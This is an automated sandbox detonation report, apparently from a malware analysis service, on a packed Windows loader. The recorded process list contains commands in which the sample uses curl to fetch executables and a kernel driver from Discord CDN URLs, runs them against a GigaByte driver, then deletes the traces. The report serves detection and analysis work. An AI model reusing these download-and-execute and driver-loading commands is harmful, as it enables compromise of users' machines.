C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 56772c8baf249b1fc374fe3c3eed862b |
| SHA1 | 79eafe858479fb3e6fc1656b2997a76e76a4b104 |
| SHA256 | ac38a0c100b6491f27875fe460d41dfbe31e5880dc87fc071cfc00f72b75bd2d |
| SHA512 | e9d0d5ca8f812649fb41a436d2649385f99bd95351b807ae6bb711ed79cabb579b9ff6b8f20c7d4280a83bee5ed5b0582240c73ea20bed9ca870e817e192c0fe |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-22 10:27
Reported
2023-12-23 14:01
Platform
win10v2004-20231222-en
Max time kernel
147s
Max time network
149s
Command Line
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys | C:\Windows\system32\curl.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3803511929-1339359695-2191195476-1000\{C2E60467-E04D-44D5-B9C0-E013DBFC1DBA} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe
"C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Color C
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start https://discord.gg/7fhtVRZEC6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/7fhtVRZEC6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffcf0946f8,0x7fffcf094708,0x7fffcf094718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3596 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4000 /prefetch:8
C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/882824212316835860/883920268165275648/Monke.exe --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/882824212316835860/883920268165275648/Monke.exe --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1
C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/882824212316835860/883920352911163392/CongratsYouCrackedAUnprotectedInjector.sys --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/882824212316835860/883920352911163392/CongratsYouCrackedAUnprotectedInjector.sys --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\Monke.exe C:\Windows\GigaByteTech.sys >nul 2>&1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /f /q C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /f /q C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2780 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.gg | udp |
| US | 162.159.133.234:443 | discord.gg | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 234.133.159.162.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.179.17.96.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| N/A | 127.0.0.1:6463 | | tcp |
| N/A | 127.0.0.1:6464 | | tcp |
| N/A | 162.159.129.233:443 | | tcp |
| N/A | 162.159.129.233:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 127.0.0.1:6465 | | tcp |
| N/A | 127.0.0.1:6466 | | tcp |
| N/A | 127.0.0.1:6467 | | tcp |
| N/A | 127.0.0.1:6468 | | tcp |
| N/A | 127.0.0.1:6469 | | tcp |
| N/A | 127.0.0.1:6470 | | tcp |
| N/A | 127.0.0.1:6471 | | tcp |
| N/A | 127.0.0.1:6472 | | tcp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.178.89.13.in-addr.arpa | udp |
Files
memory/5048-1-0x00007FF65BED0000-0x00007FF65C829000-memory.dmp
memory/5048-0-0x00007FFFED310000-0x00007FFFED312000-memory.dmp
memory/5048-2-0x00007FF65BED0000-0x00007FF65C829000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 1386433ecc349475d39fb1e4f9e149a0 |
| SHA1 | f04f71ac77cb30f1d04fd16d42852322a8b2680f |
| SHA256 | a7c79320a37d3516823f533e0ca73ed54fc4cdade9999b9827d06ea9f8916bbc |
| SHA512 | fcd5449c58ead25955d01739929c42ffc89b9007bc2c8779c05271f2d053be66e05414c410738c35572ef31811aff908e7fe3dd7a9cef33c27acb308a420280e |
\??\pipe\LOCAL\crashpad_1500_FJTAQUEHBAOAXEIG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 3a2e0c9dcc0cfd4506dfeb7380e9f8e1 |
| SHA1 | 46c09db0c959a43fe52e51d8ae0784f5790744d9 |
| SHA256 | e40c399298236afe95b2f6d012f920086222d0fbc114e7efa567218cb4229c24 |
| SHA512 | e987c6e7a2335e34a435abaacd4065e63bbdfa57c8ee6d56e3b8a0581f279a04375ae7c5b6b1c51068e9385d4d950231b4ef54d7eca00261ff78b33b3f2a255f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
| MD5 | 3631fb192c457a8b79e24be447f130c2 |
| SHA1 | d1e91dbc18a6cea9f3a70ba917b5d95cc64fb040 |
| SHA256 | 9729db4909f45672e4220a333f95ef8e5b8b1f17bdfb86fd5c3a6fd511d576c0 |
| SHA512 | 5cd5bf670f06f597322b03fac537c3082e8d0f13a81c47157353c10cbca34bc4a59a4b6ed35ae949b25250f175d423ea14a9f89f0bd9bd502ef3338328fb0415 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 574e914ae828133a9e2752b81f0fba77 |
| SHA1 | 040648b6303490ba437e36f9cea5d55cfa46b089 |
| SHA256 | 9277cf0627923c25e9d6a618e5aa8f68bd7919dcdade570496e4c6497cad754c |
| SHA512 | 0c1fb4d014a7962b08b257287685130dc73c17aadd0191d3e958c001b206c0ca005bb08cde84389a9738a753775e657742d63a0184f2e29b1f011da708936e9b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | cd7a481992bb3c6c6c91230ebe41719a |
| SHA1 | 6f015adee0521bf04a0a1947d0b03b4c2e5602eb |
| SHA256 | 833dfd26a6d489a70511c3f8c7b2a3892b5d564f4a713bef70ce8109cf7ee0df |
| SHA512 | 79582828cbd9ab1183c5349f432421163d690f56f967eea3c6101a17becdd0e6b2e921229535bf231f1d258e7c3e3bb5c5dccd6523d9eb8d2f0e0909ff75174b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | e664066e3aa135f185ed1c194b9fa1f8 |
| SHA1 | 358ff3c6ad0580b8ae1e5ef2a89a4e597c2efdc5 |
| SHA256 | 86e595be48dbc768a52d7ea62116036c024093e1302aced8c29dd6a2d9935617 |
| SHA512 | 58710818b5f664006a5aa418da6c8cd3f709c2265bc161f81b9dfe6cdb8304fabaa4ce9deba419fe4281623feeeaa0321f481ae5855d347c6d8cf95968ee905e |
C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
| MD5 | 2a9323a6cbaff798e17c01be2f9b4b4e |
| SHA1 | f21da1dff74fa8a4fc700053352bb70d43d3d3ea |
| SHA256 | d89542d7df229de0447f183395234cf06adb621ac143567b1559e05d94d32d89 |
| SHA512 | 84eaaf174dfc83c7aac9182eb565ed10f70319bac3b25429b1d281b1a5d9787545d77dd924903845d2cd213d60ae016818e8fba3bbadd648b5fad38348285688 |
memory/5048-291-0x00007FF65BED0000-0x00007FF65C829000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 0f6976ad6d5540f1f51f0df6839d48c9 |
| SHA1 | d5f7f1a5c8308766c23d4d07b443ceffae8b13be |
| SHA256 | a807bebf57431338d1d2e4ab939370aec25f17bf6fdb903335b69a2cffeb55f1 |
| SHA512 | 6799e3c695660c81b7bd30c91c97289a826967f75cec76e322b01c2105f825b5c0241038b7c35eed2dd09961bc83f96b965379a9e20f5d04b3abebbe643a4082 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 174d2805548b3042244d48d9917aecde |
| SHA1 | f01ed149e9dd669ec548e55ff9210e3693fe7ad9 |
| SHA256 | e72fe1eef49f172b5b6f2aa423d6e77d54a86abc3d86a3765084abeca55e5ef7 |
| SHA512 | 50fd27d8f07417d786b3300a0ae27c1b1802f5bb0d9fbf9c32260d63604f1a68cc698836922258bed984d4961442419bceb533c0bd7dc67c88e28d993db5e345 |